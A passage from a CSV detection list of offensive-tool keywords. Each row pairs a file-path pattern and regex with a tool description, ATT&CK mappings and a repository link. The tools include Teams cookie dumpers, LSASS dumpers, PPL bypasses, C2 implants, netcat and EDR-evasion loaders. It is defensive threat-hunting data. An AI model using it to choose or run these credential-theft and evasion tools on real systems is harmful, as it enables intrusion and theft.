Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" 
"*\teams_localdb.py*",".{0,1000}\\teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\teamserver-win.zip*",".{0,1000}\\teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\teamstracker.py*",".{0,1000}\\teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*\Temp\cme_hosted*",".{0,1000}\\Temp\\cme_hosted.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Temp\csrss.dmp*",".{0,1000}\\Temp\\csrss\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 
"*\temp\dump.txt*",".{0,1000}\\temp\\dump\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Temp\dumpert*",".{0,1000}\\Temp\\dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\temp\hollow.dll*",".{0,1000}\\temp\\hollow\.dll.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*\Temp\lsass.dmp*",".{0,1000}\\Temp\\lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\temp\pwned.trx*",".{0,1000}\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Temp\Reaper.exe*",".{0,1000}\\Temp\\Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\Temp\RTCore64.sys*",".{0,1000}\\Temp\\RTCore64\.sys.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*\Temp\tor\control-port-*",".{0,1000}\\Temp\\tor\\control\-port\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Temp\tor\torrc-*",".{0,1000}\\Temp\\tor\\torrc\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Temp\Wdlogfile.log*",".{0,1000}\\Temp\\Wdlogfile\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Temp\WinAuditDB.accdb*",".{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\termsrv.patch.dll*",".{0,1000}\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Test.PME",".{0,1000}\\Test\.PME","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\test_mitm_initialization.py*",".{0,1000}\\test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\TestNetConnectionCommand.cs",".{0,1000}\\TestNetConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\tests\beacon64.bin*",".{0,1000}\\tests\\beacon64\.bin.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*\TGSThief\*",".{0,1000}\\TGSThief\\.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*\the-backdoor-factory\*",".{0,1000}\\the\-backdoor\-factory\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF 
Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\Theif.dll*",".{0,1000}\\Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\ThemeBleed.exe *",".{0,1000}\\ThemeBleed\.exe\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*\ThemeBleed.sln*",".{0,1000}\\ThemeBleed\.sln.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*\TheThing.exe*",".{0,1000}\\TheThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\thread-injector.exe*",".{0,1000}\\thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Throwback.exe*",".{0,1000}\\Throwback\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\Throwback\Throwback.h*",".{0,1000}\\Throwback\\Throwback\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\ThrowbackDLL\*",".{0,1000}\\ThrowbackDLL\\.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\Throwback-master.zip*",".{0,1000}\\Throwback\-master\.zip.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - 
TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*\ticket_converter.py*",".{0,1000}\\ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*\Tickets\KerbDump*",".{0,1000}\\Tickets\\KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\TikiCompiler.txt*",".{0,1000}\\TikiCompiler\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiService.exe*",".{0,1000}\\TikiService\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiSpawn.*",".{0,1000}\\TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\tikispawn.xml*",".{0,1000}\\tikispawn\.xml.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiTorch\Aggressor*",".{0,1000}\\TikiTorch\\Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\tmp\dll-collection*",".{0,1000}\\tmp\\dll\-collection.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*\Tmp\nc.exe*",".{0,1000}\\Tmp\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Tmp\netcat.exe*",".{0,1000}\\Tmp\\netcat\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\tmp_payload.txt*",".{0,1000}\\tmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" 
